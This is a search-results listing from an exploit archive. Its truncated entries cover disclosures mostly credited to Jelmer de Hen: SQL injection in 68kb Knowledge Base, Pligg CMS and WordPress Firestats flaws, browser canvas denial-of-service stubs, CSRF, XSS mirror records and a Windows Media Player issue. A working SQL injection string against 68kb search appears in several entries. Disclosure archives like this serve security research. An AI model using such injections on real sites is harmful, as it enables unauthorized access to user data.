13 matches found
68kb Knowledge Base Script 1.0.0rc2 Search - SQL Injection
Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %'//UNION//ALL//SELECT//1,2,user,4,5,6,7,8,9,10,11,12,13,14,15 Don't use spaces in...
Pligg CMS 1.1.3 Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit title: Pligg CMS file existence exploration/shared hosting privilege escalation H.ackAck.net Found by: Jelmer de Hen 15/03/2011 I released some Pligg exploits: http://h.ackack.net/the-pligg-cms-0dayset-1.html 22/03/2011 a patch became...
WordPress Plugin Firestats - Remote Configuration File Download
Exploit Title: Wordpress firestats remote configuration file download Date: 2010-07-09 Author: Jelmer de Hen Software Link: http://firestats.cc/ Version: 1.6.5 Tested on: PHP Do a simple GET request to this file:...
Canvas Tag Denial Of Service
"; while 1 echo ""; echo ""; echo ""; ?...
Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service
Exploit for windows platform in category dos / poc. "; while 1 echo ""; echo ""; echo ""; ? 0day.today...
Canvas tag DoS - Multiple Browsers
Exploit for multiple platform in category dos / poc. "; while 1 echo ""; echo ""; echo ""; ? 0day.today 2018-04-11...
68kb Knowledge Base v1.0.0rc3 edit main settings CSRF
Exploit for php platform in category web applications. Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF Date:...
68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection
Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %'//UNION//ALL//SELECT//1,2,user,4,5,6,7,8,9,10,11,12,13,14,15 Don't use spaces in the injection because they change...
68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection
Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for:...
Unfixed XSS vulnerability at secure.mobilitypass.com
Security researcher Jelmer de Hen submitted on 28/08/2009 a cross-site scripting (XSS) vulnerability affecting secure.mobilitypass.com, which at the time of submission ranked 729724 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 24/05/2010...
Unfixed XSS vulnerability at exmachina.nl
Security researcher Jelmer submitted on 16/03/2009 a cross-site scripting (XSS) vulnerability affecting exmachina.nl, which at the time of submission ranked 3500054 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 12/07/2009. It is currently...
Fixed XSS vulnerability at www.basstdance.nl
Security researcher jelmer submitted on 28/01/2009 a cross-site scripting (XSS) vulnerability affecting www.basstdance.nl, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 24/05/2009. It is currently...
Terrible: Windows Media Player
Wednesday, August 21, 2002 Dear Mister, 'silent delivery and installation of an executable on the target computer, no client input other than viewing a web page' default installation of Internet Explorer and Windows Media Player. This is truly terrible. In addition to server side '404 errors',...